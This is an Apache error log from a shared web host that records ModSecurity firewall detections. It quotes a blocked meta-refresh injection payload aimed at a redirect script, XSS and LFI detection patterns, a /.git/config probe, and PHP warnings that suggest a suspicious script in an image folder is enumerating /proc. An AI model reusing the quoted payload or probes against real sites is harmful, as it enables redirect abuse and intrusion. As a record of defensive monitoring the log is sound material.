[Tue May 12 00:03:02.269144 2026] [security2:error] [pid 1605480:tid 1605538] [client 43.165.174.53:48666] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/"] [unique_id "agJSFh2Cvzd_nyNfUm8gygAAARA"], referer: http://www.castiglionecorporatefinance.fr
[Tue May 12 00:03:03.821045 2026] [:error] [pid 1588898:tid 1588911] [client 46.101.138.200:49820] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 00:03:14.045150 2026] [security2:error] [pid 1590352:tid 1590412] [client 194.233.64.127:54087] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://https:/%evolv.elupc@haedongacademy.org/phpinfo.php?a[]=<a href=https://hideuri.com/18pbzl>kampus swasta di bandung</a><meta http-equiv=refresh content=0;url=https://hideuri.com/18pbzl />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJSIq1q0G_aXAqWauQcPQAAAJQ"]
[Tue May 12 00:03:14.047580 2026] [security2:error] [pid 1590352:tid 1590412] [client 194.233.64.127:54087] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://hideuri.com/18PBzL>kampus swasta di bandung</a><meta http-equiv=refresh content=0;url=https://hideuri.com/18PBzL /> found within ARGS:url: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://hideuri.com/18PBzL>kampus swasta di bandung</a><meta http-equiv=refresh content=0;url=https://hideuri.com/18PBzL />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJSIq1q0G_aXAqWauQcPQAAAJQ"]
[Tue May 12 00:03:14.047979 2026] [security2:error] [pid 1590352:tid 1590412] [client 194.233.64.127:54087] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://hideuri.com/18PBzL /> found within ARGS:url: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://hideuri.com/18PBzL>kampus swasta di bandung</a><meta http-equiv=refresh content=0;url=https://hideuri.com/18PBzL />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJSIq1q0G_aXAqWauQcPQAAAJQ"]
[Tue May 12 00:03:14.049176 2026] [security2:error] [pid 1590352:tid 1590412] [client 194.233.64.127:54087] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://hideuri.com/18PBzL>kampus swasta di bandung</a><meta http-equiv=refresh content=0;url=https://hideuri.com/18PBzL />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSen [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJSIq1q0G_aXAqWauQcPQAAAJQ"]
[Tue May 12 00:03:14.049908 2026] [security2:error] [pid 1590352:tid 1590412] [client 194.233.64.127:54087] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://hideuri.com/18PBzL>kampus swasta di bandung</a><meta http-equiv=refresh content=0;url=https://hideuri.com/18PBzL />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJSIq1q0G_aXAqWauQcPQAAAJQ"]
[Tue May 12 00:03:14.050437 2026] [security2:error] [pid 1590352:tid 1590412] [client 194.233.64.127:54087] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJSIq1q0G_aXAqWauQcPQAAAJQ"]
[Tue May 12 00:03:14.051108 2026] [security2:error] [pid 1590352:tid 1590412] [client 194.233.64.127:54087] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJSIq1q0G_aXAqWauQcPQAAAJQ"]
[Tue May 12 00:03:14.937037 2026] [security2:error] [pid 1606352:tid 1606420] [client 194.233.64.127:54102] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://https:/%evolv.elupc@haedongacademy.org/phpinfo.php?a[]=<a href=https://hideuri.com/18pbzl>kampus swasta di bandung</a><meta http-equiv=refresh content=0;url=https://hideuri.com/18pbzl />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJSIno_DFxNSZVmaX3wgQAAAME"]
[Tue May 12 00:03:14.938374 2026] [security2:error] [pid 1606352:tid 1606420] [client 194.233.64.127:54102] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://hideuri.com/18PBzL>kampus swasta di bandung</a><meta http-equiv=refresh content=0;url=https://hideuri.com/18PBzL /> found within ARGS:url: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://hideuri.com/18PBzL>kampus swasta di bandung</a><meta http-equiv=refresh content=0;url=https://hideuri.com/18PBzL />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJSIno_DFxNSZVmaX3wgQAAAME"]
[Tue May 12 00:03:14.939253 2026] [security2:error] [pid 1606352:tid 1606420] [client 194.233.64.127:54102] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://hideuri.com/18PBzL /> found within ARGS:url: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://hideuri.com/18PBzL>kampus swasta di bandung</a><meta http-equiv=refresh content=0;url=https://hideuri.com/18PBzL />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJSIno_DFxNSZVmaX3wgQAAAME"]
[Tue May 12 00:03:14.941694 2026] [security2:error] [pid 1606352:tid 1606420] [client 194.233.64.127:54102] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://hideuri.com/18PBzL>kampus swasta di bandung</a><meta http-equiv=refresh content=0;url=https://hideuri.com/18PBzL />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSen [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJSIno_DFxNSZVmaX3wgQAAAME"]
[Tue May 12 00:03:14.946453 2026] [security2:error] [pid 1606352:tid 1606420] [client 194.233.64.127:54102] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://hideuri.com/18PBzL>kampus swasta di bandung</a><meta http-equiv=refresh content=0;url=https://hideuri.com/18PBzL />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJSIno_DFxNSZVmaX3wgQAAAME"]
[Tue May 12 00:03:14.946830 2026] [security2:error] [pid 1606352:tid 1606420] [client 194.233.64.127:54102] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJSIno_DFxNSZVmaX3wgQAAAME"]
[Tue May 12 00:03:14.960099 2026] [security2:error] [pid 1606352:tid 1606420] [client 194.233.64.127:54102] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJSIno_DFxNSZVmaX3wgQAAAME"]
[Tue May 12 00:03:17.326915 2026] [:error] [pid 1590352:tid 1590396] [client 157.245.237.145:51248] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 00:03:21.756201 2026] [ssl:error] [pid 1605480:tid 1605524] (EAI 2)Name or service not known: [client 34.130.120.108:53776] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 00:03:21.756691 2026] [ssl:error] [pid 1605480:tid 1605524] AH01941: stapling_renew_response: responder error
[Tue May 12 00:03:23.134078 2026] [security2:error] [pid 1605480:tid 1605524] [client 34.130.120.108:53776] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.git/config"] [unique_id "agJSKx2Cvzd_nyNfUm8hAgAAAQI"]
[Tue May 12 00:03:23.134414 2026] [security2:error] [pid 1605480:tid 1605524] [client 34.130.120.108:53776] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.git/config"] [unique_id "agJSKx2Cvzd_nyNfUm8hAgAAAQI"]
[Tue May 12 00:03:23.139075 2026] [security2:error] [pid 1605480:tid 1605524] [client 34.130.120.108:53776] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agJSKx2Cvzd_nyNfUm8hAgAAAQI"]
[Tue May 12 00:03:31.209634 2026] [security2:error] [pid 1630927:tid 1630933] [client 43.134.178.104:45464] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "agJSM2iGYYhUwDaJINmuPQAAAUM"]
[Tue May 12 00:03:31.566870 2026] [:error] [pid 1606352:tid 1606438] [client 157.245.237.145:45070] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 00:03:32.619546 2026] [security2:error] [pid 1605480:tid 1605526] [client 43.153.205.132:49096] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "apoe.fr"] [uri "/downloads/APOE-PREVISIONNEL-2018-2019.pdf"] [unique_id "agJSNB2Cvzd_nyNfUm8hNAAAAQQ"]
[Tue May 12 00:03:32.649268 2026] [:error] [pid 1601130:tid 1601158] [client 46.101.138.200:41460] File does not exist: /home/totalcloud/public_html/index.php
PHP Warning:  filesize(): stat failed for /proc/1704525/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704525/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704525/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704525/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704525/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704525/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/55/task/55/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/55/task/55/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/55/task/55/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/55/task/55/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/55/task/55/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/55/task/55/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705228/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705228/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705228/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705228/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705228/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705228/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 00:03:56.591927 2026] [:error] [pid 1590352:tid 1590412] [client 46.151.178.13:51106] File does not exist: /home/totalcloud/public_html/index.php, referer: http://217.113.192.26:443/
[Tue May 12 00:04:01.828133 2026] [security2:error] [pid 1590352:tid 1590403] [client 43.133.42.227:34188] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "letamsgarage.fr"] [uri "/wp-content/uploads/2018/08/les-youngtimers-1980a2000-le"] [unique_id "agJSUa1q0G_aXAqWauQcYgAAAIs"]
[Tue May 12 00:04:10.995365 2026] [ssl:error] [pid 1590352:tid 1590399] (EAI 2)Name or service not known: [client 104.131.84.245:54638] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 00:04:10.995523 2026] [ssl:error] [pid 1590352:tid 1590399] AH01941: stapling_renew_response: responder error
[Tue May 12 00:04:12.312601 2026] [ssl:error] [pid 1601130:tid 1601150] (EAI 2)Name or service not known: [client 212.80.203.60:38531] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 00:04:12.312643 2026] [ssl:error] [pid 1601130:tid 1601150] AH01941: stapling_renew_response: responder error
[Tue May 12 00:04:12.777446 2026] [ssl:error] [pid 1630927:tid 1630936] (EAI 2)Name or service not known: [client 109.238.198.134:42495] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 00:04:12.777494 2026] [ssl:error] [pid 1630927:tid 1630936] AH01941: stapling_renew_response: responder error
[Tue May 12 00:04:15.504222 2026] [ssl:error] [pid 1606352:tid 1606433] (EAI 2)Name or service not known: [client 172.124.86.233:54745] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 00:04:15.504271 2026] [ssl:error] [pid 1606352:tid 1606433] AH01941: stapling_renew_response: responder error
[Tue May 12 00:04:20.162120 2026] [ssl:error] [pid 1590352:tid 1590397] (EAI 2)Name or service not known: [client 149.28.238.123:41898] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 00:04:20.162188 2026] [ssl:error] [pid 1590352:tid 1590397] AH01941: stapling_renew_response: responder error
[Tue May 12 00:04:23.202796 2026] [ssl:error] [pid 1590352:tid 1590409] (EAI 2)Name or service not known: [client 188.214.93.216:36019] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 00:04:23.202851 2026] [ssl:error] [pid 1590352:tid 1590409] AH01941: stapling_renew_response: responder error
[Tue May 12 00:04:26.303999 2026] [ssl:error] [pid 1601130:tid 1601158] (EAI 2)Name or service not known: [client 203.166.132.165:35947] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 00:04:26.304043 2026] [ssl:error] [pid 1601130:tid 1601158] AH01941: stapling_renew_response: responder error
[Tue May 12 00:04:31.922975 2026] [ssl:error] [pid 1588898:tid 1588901] (EAI 2)Name or service not known: [client 162.243.104.81:51730] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 00:04:31.923110 2026] [ssl:error] [pid 1588898:tid 1588901] AH01941: stapling_renew_response: responder error
[Tue May 12 00:04:36.087356 2026] [ssl:error] [pid 1630927:tid 1630949] (EAI 2)Name or service not known: [client 2.56.16.86:44979] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 00:04:36.087410 2026] [ssl:error] [pid 1630927:tid 1630949] AH01941: stapling_renew_response: responder error
[Tue May 12 00:04:44.597190 2026] [ssl:error] [pid 1601130:tid 1601150] (EAI 2)Name or service not known: [client 159.223.167.243:50170] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 00:04:44.597237 2026] [ssl:error] [pid 1601130:tid 1601150] AH01941: stapling_renew_response: responder error
[Tue May 12 00:04:45.527334 2026] [ssl:error] [pid 1606352:tid 1606430] (EAI 2)Name or service not known: [client 88.218.146.10:45801] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 00:04:45.527451 2026] [ssl:error] [pid 1606352:tid 1606430] AH01941: stapling_renew_response: responder error
